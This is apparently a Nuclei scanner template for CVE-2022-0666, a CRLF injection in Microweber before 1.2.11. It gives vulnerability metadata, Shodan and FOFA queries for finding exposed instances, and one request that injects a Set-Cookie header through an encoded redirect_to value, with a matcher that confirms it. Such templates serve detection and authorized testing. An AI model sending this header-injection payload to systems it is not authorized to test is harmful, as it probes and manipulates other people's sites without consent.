id: CVE-2022-0666

info:
  name: Microweber < 1.2.11 - CRLF Injection
  author: ritikchaddha
  severity: high
  description: |
    CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.
  reference:
    - https://github.com/microweber/microweber/commit/f0e338f1b7dc5ec9d99231f4ed3fa6245a5eb128
    - https://huntr.dev/bounties/7215afc7-9133-4749-8e8e-0569317dbd55
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0666
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-0666
    cwe-id: CWE-93
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microweber
    product: microweber
    shodan-query:
      - http.favicon.hash:780351152
      - http.html:"microweber"
    fofa-query:
      - icon_hash=780351152
      - body="microweber"
  tags: cve,huntr,crlf,microweber,cve2022

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;"

    matchers:
      - type: regex
        part: header
        regex:
          - "^Set-Cookie: crlfinjection=1;"
# digest: 4b0a004830460221009ff39840d07b4bbb2685c3f679ff55d7973957f147815e60009828128eff6d5a02210091f89ebc0ccf0fdaa245ae0916861e22c67657b292a594a8b639a94cad24add6:922c64590222798bb761d5b6d8e72950